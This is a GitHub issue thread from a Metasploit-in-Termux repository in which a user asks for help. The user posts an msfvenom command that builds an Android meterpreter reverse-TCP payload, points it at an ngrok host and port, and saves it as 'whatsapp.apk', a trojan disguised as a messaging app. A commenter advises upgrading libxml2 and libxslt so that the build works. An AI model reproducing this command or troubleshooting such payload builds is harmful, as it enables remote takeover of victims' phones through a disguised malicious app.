### ISSUE TITLE
please solve the problem

### ISSUE THREAD

**Issue by khalid-Hake** [gushmazuko/metasploit_in_termux#195]
msfvenom -p android/meterpreter/reverse_tcp LHOST=4.tcp.eu.ngrok.io LPORT=14866  R> /sdcard/whatsapp.apk
WARNING: Nokogiri was built against libxml version 2.9.14, but has dynamically loaded 2.10.2
WARNING: Nokogiri was built against libxslt version 1.1.36, but has dynamically loaded 1.1.37

**Comment by khalid-Hake** [comment]
![Uploading Screenshot_٢٠٢٢٠٩٢٨-٠٢٠٢٣٨_Termux.jpg…]()

**Comment by khalid-Hake** [comment]
Look

**Comment by dedshit** [comment]
> Look



> msfvenom -p android/meterpreter/reverse_tcp LHOST=4.tcp.eu.ngrok.io LPORT=14866 R> /sdcard/whatsapp.apk WARNING: Nokogiri was built against libxml version 2.9.14, but has dynamically loaded 2.10.2 WARNING: Nokogiri was built against libxslt version 1.1.36, but has dynamically loaded 1.1.37

upgrade libxml2 , libxslt

**Comment by dedshit** [comment]
> Look

send screenshot again

**Comment by Fabiohg** [comment]
This is first trying on way to learn hack steps
